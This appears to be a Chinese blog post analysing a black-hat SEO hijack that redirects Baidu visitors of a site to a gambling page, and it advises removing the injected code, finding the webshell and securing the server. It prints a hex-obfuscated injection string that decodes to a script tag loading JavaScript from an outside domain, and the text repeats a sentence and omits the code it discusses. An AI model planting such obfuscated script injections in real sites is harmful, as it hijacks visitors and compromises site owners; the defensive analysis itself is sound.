|
[dns被劫持怎么辦]詳解分析,解決黑帽seo劫持問題。網站從百度搜索進去,首頁發生跳轉到菠菜網,開發公司的說可能是百度的問題,不是我們的問題,針對這個就想提一下,首先遇到問題就去分析問題,再去找出問題,然后解決問題,最后做好防范措施,而不是首先就想著推脫責任。
只需要看頭部代碼好熟悉,黑帽seo這行技術這幾年也沒什么創新,刪除這兩行就可以解決基本問題
如果是無法直接從首頁查看源碼的情況,那么在瀏覽器輸入view-source:www.baidutop321.com就可以查看網頁源碼
只需要看頭部代碼好熟悉,黑帽seo這行技術這幾年也沒什么創新,刪除這兩行就可以解決基本問題
這段意思就是判斷百度搜索訪問用戶進行跳轉,你去360,搜狗搜索訪問肯定是不會發生跳轉的,然后我們再來解最后一段代碼
先進行js解壓,得出結果
javascript代碼方式解密
1:\x64\x6f\x63\x75\x6d\x65\x6e\x74 結果 document
3:\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x62\x63\x64\x61\x73\x38\x2e\x63\x6f\x6d\x2f\x33\x36\x35\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e
到了這里整個過程已經很清晰了,雖然我們刪除了這段代碼但只能暫時解決問題,需要找出webshell,做一個全面的網站和服務器安全策略,這種批量GetShell的基本上都是通過目前已經開放的漏洞,所以相對還是比較容易處理。
大多數人對網站的理解還停留在視覺層面,網絡安全的重要性反而被忽視,任何公司都需要提高對網絡安全的重視。 |
